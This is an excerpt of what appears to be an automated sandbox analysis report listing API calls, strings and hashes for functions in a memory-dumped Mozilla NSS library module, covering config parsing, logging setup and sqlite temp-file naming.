                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: strcmp
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1004003707-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C585B90: PR_Lock.NSS3(00010000,?,00000000,?,6C46DF9B), ref: 6C585B9E
                                                                                                                                                                                                                                                        • Part of subcall function 6C585B90: PR_Unlock.NSS3 ref: 6C585BEA
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000014,00000000,-000000D7,?,?,?,?,?,?,?,?,6C585E23,6C46E154), ref: 6C585EBF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LockUnlockmemset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1725470033-0
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterSectionUnlockValue$Error
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2275178025-0
APIs
• isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C4D5E08
• NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C4D5E3F
• PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C4D5E5C
• free.MOZGLUE(00000000), ref: 6C4D5E7E
• free.MOZGLUE(00000000), ref: 6C4D5E97
• PORT_Strdup_Util.NSS3(secmod.db), ref: 6C4D5EA5
• _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C4D5EBB
• NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C4D5ECB
• PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C4D5EF0
• free.MOZGLUE(00000000), ref: 6C4D5F12
• NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C4D5F35
• PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C4D5F5B
• free.MOZGLUE(00000000), ref: 6C4D5F82
• PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C4D5FA3
• PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C4D5FB7
• NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C4D5FC4
• free.MOZGLUE(00000000), ref: 6C4D5FDB
• NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C4D5FE9
• free.MOZGLUE(00000000), ref: 6C4D5FFE
• NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C4D600C
• isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D6027
• PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C4D605A
• PR_smprintf.NSS3(6C5AAAF9,00000000), ref: 6C4D606A
• free.MOZGLUE(00000000), ref: 6C4D607C
• free.MOZGLUE(00000000), ref: 6C4D609A
• free.MOZGLUE(00000000), ref: 6C4D60B2
• free.MOZGLUE(?), ref: 6C4D60CE
Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                                                                                                                                                                                      • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                                                                                                                                                                                      • API String ID: 1427204090-154007103
                                                                                                                                                                                                                                                      • Opcode ID: 3ce9627da797c287500cb1c4c359e89076e15484484d005fff55d1a31af77e3d
                                                                                                                                                                                                                                                      • Instruction ID: d7d0e43d949374730e3df7721b3848e3fdf1a0f9ee5eec15076dd9646009c8f8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ce9627da797c287500cb1c4c359e89076e15484484d005fff55d1a31af77e3d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8391F5F09042055BEB01FF659C95F9E3BA4DF06289F0A0468EC559BB42EB31F905C7A2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C461DA3
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C461DB2
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C461DD8
                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C461E4F
                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C461EA4
                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C461ECD
                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C461EEF
                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C461F17
                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C461F34
                                                                                                                                                                                                                                                      • PR_SetLogBuffering.NSS3(00004000), ref: 6C461F61
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C461F6E
                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C461F83
                                                                                                                                                                                                                                                      • PR_SetLogFile.NSS3(00000000), ref: 6C461FA2
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C461FB8
                                                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(00000000), ref: 6C461FCB
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C461FD2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                                                                                                                                                                                                                      • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                                                                                                                                                                                                                      • API String ID: 2013311973-4000297177
                                                                                                                                                                                                                                                      • Opcode ID: 90aab3074630ecaea955167674c192dec8ecc098b701702f8dbaca9c808d914c
                                                                                                                                                                                                                                                      • Instruction ID: 9eac069976ad8792fbc366bb460cb33eefb76ab86b586f47e734d0bd0bf36c7e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90aab3074630ecaea955167674c192dec8ecc098b701702f8dbaca9c808d914c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22517DB1E002599BDF00DBE6CC44F9E77B8AF05309F080529E816EBB49E771E918CB95
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,6C40BE66), ref: 6C546E81
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C40BE66), ref: 6C546E98
                                                                                                                                                                                                                                                      • sqlite3_snprintf.NSS3(?,00000000,6C5AAAF9,?,?,?,?,?,?,6C40BE66), ref: 6C546EC9
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C40BE66), ref: 6C546ED2
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C40BE66), ref: 6C546EF8
                                                                                                                                                                                                                                                      • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C40BE66), ref: 6C546F1F
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546F28
                                                                                                                                                                                                                                                      • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546F3D
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C40BE66), ref: 6C546FA6
                                                                                                                                                                                                                                                      • sqlite3_snprintf.NSS3(?,00000000,6C5AAAF9,00000000,?,?,?,?,?,?,?,6C40BE66), ref: 6C546FDB
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546FE4
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C546FEF
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C40BE66), ref: 6C547014
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,6C40BE66), ref: 6C54701D
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C40BE66), ref: 6C547030
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C40BE66), ref: 6C54705B
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C40BE66), ref: 6C547079
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C40BE66), ref: 6C547097
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C40BE66), ref: 6C5470A0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                                                                                                                                                      • String ID: PXl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                                                      • API String ID: 593473924-1839926694
                                                                                                                                                                                                                                                      • Opcode ID: bf5f1bfb6da3c2e80b5a60b0ed525ab40d75b67ac1899ec27505fc0c67adb518
                                                                                                                                                                                                                                                      • Instruction ID: 1f6d9dd8d4a14d9bd13f1e76fdae3e36860dc56447b1169382f773de1766e511
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf5f1bfb6da3c2e80b5a60b0ed525ab40d75b67ac1899ec27505fc0c67adb518
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83518BB1A013116BE7109B309C51FBF36668F92358F148938E81596BC2FF25A91EC6D3
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000,00000000,00000001), ref: 6C4D5009
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4D5049
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D505D
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C4D5071
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5089
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D50A1
                                                                                                                                                                                                                                                      • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C4D50B2
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2), ref: 6C4D50CB
                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D50D9
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4D50F5
                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5103
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D511D
                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D512B
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5145
                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5153
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4D516D
                                                                                                                                                                                                                                                      • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C4D517B
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4D5195
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
                                                                                                                                                                                                                                                      • String ID: config=$library=$name=$nss=$parameters=
                                                                                                                                                                                                                                                      • API String ID: 391827415-203331871
                                                                                                                                                                                                                                                      • Opcode ID: 1b27fcad2449a757ccef673a2135b6e669f78c3b9df840e15a4befa3bb81eeab
                                                                                                                                                                                                                                                      • Instruction ID: 8d755990a2ee1e0775b61e8b42e9058d8f9c7937047295ca205803efd5059ae6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b27fcad2449a757ccef673a2135b6e669f78c3b9df840e15a4befa3bb81eeab
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 365140F5A01116ABEB01EF249C51EAE37B8DF06249F150024EC59E7741EB25F915C7F2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4C50
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4C5B
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(6C5AAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4C76
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4CAE
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4CC9
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4CF4
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4D0B
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4D5E
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4D68
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C4D4D85
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C4D4DA2
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4D4DB9
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D4DCF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                                                      • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                                                      • API String ID: 3756394533-2552752316
                                                                                                                                                                                                                                                      • Opcode ID: da30a6a26ccb9d27b53399287da330101b6e1e1bc8105615efcd7ce6a8192dee
                                                                                                                                                                                                                                                      • Instruction ID: d324d214552aceac84dbdb1468c0d23625c44a9b3373f380bc4fca2c22177879
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da30a6a26ccb9d27b53399287da330101b6e1e1bc8105615efcd7ce6a8192dee
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72418CB1900145ABEB12EF55AC54EBF3675AF82398F1B4128E8164BB01E731F925C7D3
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C4B6943
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C4B6957
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C4B6972
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C4B6983
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C4B69AA
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C4B69BE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C4B69D2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C4B69DF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C4B6A5B
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4B6D8C
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4B6DC5
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6DD6
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6DE7
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4B6E1F
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6E4B
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6E72
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6EA7
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6EC4
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6ED5
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4B6EE3
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6EF4
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6F08
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4B6F35
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6F44
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B6F5B
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4B6F65
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C4B781D,00000000,6C4ABE2C,?,6C4B6B1D,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C40
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C4B781D,?,6C4ABE2C,?), ref: 6C4B6C58
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C6F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C4B6C84
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C4B6C96
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C4B6CAA
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6F90
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6FC5
                                                                                                                                                                                                                                                      • PK11_GetInternalKeySlot.NSS3 ref: 6C4B6FF4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                                                      • String ID: +`Ll
                                                                                                                                                                                                                                                      • API String ID: 1304971872-107483513
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000084,00000001,00000000), ref: 6C462007
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000084), ref: 6C462077
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,0000002C), ref: 6C4620DF
                                                                                                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000), ref: 6C462188
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3 ref: 6C4621B7
